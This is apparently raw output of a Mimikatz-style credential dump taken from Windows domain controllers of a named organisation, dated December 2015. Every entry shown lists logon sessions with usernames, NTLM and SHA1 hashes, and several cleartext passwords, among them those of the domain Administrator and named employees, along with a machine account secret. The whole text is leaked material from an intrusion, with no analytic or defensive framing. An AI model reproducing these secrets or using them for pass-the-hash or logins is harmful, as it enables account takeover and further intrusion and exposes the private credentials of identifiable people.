
hrm(commandline) # %
Privilege '20' OK

Authentication Id : 0 ; 1251583584 (00000000:4a99a660)
Session           : RemoteInteractive from 4
User Name         : tfernandes
Domain            : ENOCHO
Logon Server      : ENOCDC3
Logon Time        : 12/26/2015 11:23:43 AM
SID               : S-1-5-21-606747145-1078081533-725345543-8938
	msv :	
	 [00000003] Primary
	 * Username : tfernandes
	 * Domain   : ENOCHO
	 * NTLM     : 282b18c5d0bac3cc97568dedc162ad73
	 * SHA1     : d57bb43087e3be8d443c43355265ce48b8cc4641
	 [00010000] CredentialKeys
	 * NTLM     : 282b18c5d0bac3cc97568dedc162ad73
	 * SHA1     : d57bb43087e3be8d443c43355265ce48b8cc4641
	tspkg :	
	wdigest :	
	 * Username : tfernandes
	 * Domain   : ENOCHO
	 * Password : sefra4484$
	kerberos :	
	 * Username : tfernandes
	 * Domain   : HO.AE.ENOC.COM
	 * Password : sefra4484$
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : ENROOTDC6$
Domain            : ENOCGROUP
Logon Server      : (null)
Logon Time        : 12/18/2015 9:23:24 AM
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : ENROOTDC6$
	 * Domain   : ENOCGROUP
	 * NTLM     : 711487cbd2cce6c7b18457597f6bcabd
	 * SHA1     : 9c69acaf02967fc3c3353640e06ca47889d4ed5a
	tspkg :	
	wdigest :	
	 * Username : ENROOTDC6$
	 * Domain   : ENOCGROUP
	 * Password : 92 90 8a bb fb fb 92 59 0d 29 28 7d 89 09 d3 d1 1f 0d d0 9b cb fd d7 c9 82 52 5a 8b 5e 01 11 9d da 86 23 c2 fd 2d 26 e6 92 6d 88 f2 90 89 e9 46 f8 b0 89 49 87 ad 85 43 31 47 e2 9a 41 37 ee 0a 5f 97 7e 0b 9e 39 57 30 1d c2 9c 2b 9d 52 98 5e bc 59 a9 c2 fd 6e 46 dc 88 80 13 ef 2f 8f 69 72 36 8c 5b 41 25 47 cd 7b 89 46 61 2a f0 bd 73 e4 82 17 40 4f 72 34 d1 92 29 92 11 28 8a 52 f4 f6 b3 e1 09 f5 e9 16 8b d8 c5 7f 9a a5 59 c9 32 61 1f 6f fb f6 a9 4c eb 85 71 cb b8 98 c2 30 20 f0 f4 b0 8c f4 1f f8 29 6f 8d d8 9c 55 29 d7 a4 e1 78 3f 25 9c 7e 2f 20 d0 92 bb 13 8b be 05 d4 d0 4b 1f 08 7a 86 21 b8 7d 09 9c 52 5b 04 5d 38 6a 70 dc d4 42 d4 75 26 30 ad cf 19 e4 13 da 6c 4a 86 29 6a 22 e6 c0 14 13 a8 6c 4a f5 ac 10 e3 57 
	kerberos :	
	 * Username : enrootdc6$
	 * Domain   : AE.ENOC.COM
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 12/18/2015 9:23:24 AM
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 860306230 (00000000:33473b36)
Session           : RemoteInteractive from 3
User Name         : santosh
Domain            : ENOCHO
Logon Server      : ENOCDC3
Logon Time        : 12/23/2015 5:07:01 PM
SID               : S-1-5-21-606747145-1078081533-725345543-45262
	msv :	
	 [00000003] Primary
	 * Username : santosh
	 * Domain   : ENOCHO
	 * NTLM     : 6ecbfdf6f1995b12c823606c0971ec49
	 * SHA1     : 972e2db89b0e542f0a27e0cd5d76a0c529b2c712
	 [00010000] CredentialKeys
	 * NTLM     : 6ecbfdf6f1995b12c823606c0971ec49
	 * SHA1     : 972e2db89b0e542f0a27e0cd5d76a0c529b2c712
	tspkg :	
	wdigest :	
	 * Username : santosh
	 * Domain   : ENOCHO
	 * Password : welcome@123
	kerberos :	
	 * Username : santosh
	 * Domain   : HO.AE.ENOC.COM
	 * Password : welcome@123
	ssp :	
	credman :	

Authentication Id : 0 ; 46342 (00000000:0000b506)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 12/18/2015 9:23:10 AM
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : ENROOTDC6$
	 * Domain   : ENOCGROUP
	 * NTLM     : 711487cbd2cce6c7b18457597f6bcabd
	 * SHA1     : 9c69acaf02967fc3c3353640e06ca47889d4ed5a
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 333284263 (00000000:13dd83a7)
Session           : RemoteInteractive from 2
User Name         : administrator
Domain            : ENOCGROUP
Logon Server      : ENROOTDC6
Logon Time        : 12/20/2015 2:14:44 PM
SID               : S-1-5-21-220523388-854245398-725345543-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : ENOCGROUP
	 * NTLM     : 058eb249582d59232b50e07e5545931b
	 * SHA1     : 9d657050ee6349187bb90bc5ba81ec8a7a507c81
	 [00010000] CredentialKeys
	 * NTLM     : 058eb249582d59232b50e07e5545931b
	 * SHA1     : 9d657050ee6349187bb90bc5ba81ec8a7a507c81
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : ENOCGROUP
	 * Password : 10g!t3ch4u
	kerberos :	
	 * Username : administrator
	 * Domain   : AE.ENOC.COM
	 * Password : 10g!t3ch4u
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : ENROOTDC6$
Domain            : ENOCGROUP
Logon Server      : (null)
Logon Time        : 12/18/2015 9:23:10 AM
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : ENROOTDC6$
	 * Domain   : ENOCGROUP
	 * Password : 92 90 8a bb fb fb 92 59 0d 29 28 7d 89 09 d3 d1 1f 0d d0 9b cb fd d7 c9 82 52 5a 8b 5e 01 11 9d da 86 23 c2 fd 2d 26 e6 92 6d 88 f2 90 89 e9 46 f8 b0 89 49 87 ad 85 43 31 47 e2 9a 41 37 ee 0a 5f 97 7e 0b 9e 39 57 30 1d c2 9c 2b 9d 52 98 5e bc 59 a9 c2 fd 6e 46 dc 88 80 13 ef 2f 8f 69 72 36 8c 5b 41 25 47 cd 7b 89 46 61 2a f0 bd 73 e4 82 17 40 4f 72 34 d1 92 29 92 11 28 8a 52 f4 f6 b3 e1 09 f5 e9 16 8b d8 c5 7f 9a a5 59 c9 32 61 1f 6f fb f6 a9 4c eb 85 71 cb b8 98 c2 30 20 f0 f4 b0 8c f4 1f f8 29 6f 8d d8 9c 55 29 d7 a4 e1 78 3f 25 9c 7e 2f 20 d0 92 bb 13 8b be 05 d4 d0 4b 1f 08 7a 86 21 b8 7d 09 9c 52 5b 04 5d 38 6a 70 dc d4 42 d4 75 26 30 ad cf 19 e4 13 da 6c 4a 86 29 6a 22 e6 c0 14 13 a8 6c 4a f5 ac 10 e3 57 
	kerberos :	
	 * Username : enrootdc6$
	 * Domain   : AE.ENOC.COM
	 * Password : (null)
	ssp :	
	credman :	
Bye!
